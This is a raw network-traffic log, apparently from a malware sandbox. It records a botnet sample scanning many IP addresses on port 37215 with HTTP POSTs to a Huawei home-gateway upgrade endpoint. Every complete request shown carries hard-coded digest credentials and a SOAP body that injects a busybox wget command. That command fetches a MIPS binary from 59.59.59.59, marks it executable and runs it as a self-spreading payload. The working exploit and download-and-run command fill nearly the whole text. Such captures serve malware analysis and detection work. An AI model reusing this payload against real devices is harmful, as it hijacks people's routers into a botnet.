                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1654192.168.2.153905241.112.20.22437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.913136005 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1655192.168.2.1534488197.162.133.25237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.913300037 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1656192.168.2.1553112157.39.94.18637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.913341999 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1657192.168.2.1544740141.49.43.24437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.921740055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1658192.168.2.154821067.65.169.5537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.923557043 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1659192.168.2.153310241.100.185.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.924146891 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1660192.168.2.1534534167.195.97.13837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.924218893 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1661192.168.2.1558062157.30.94.3937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.924242020 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1662192.168.2.1551824157.176.37.037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.927531958 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1663192.168.2.1549238197.14.3.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.929728985 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
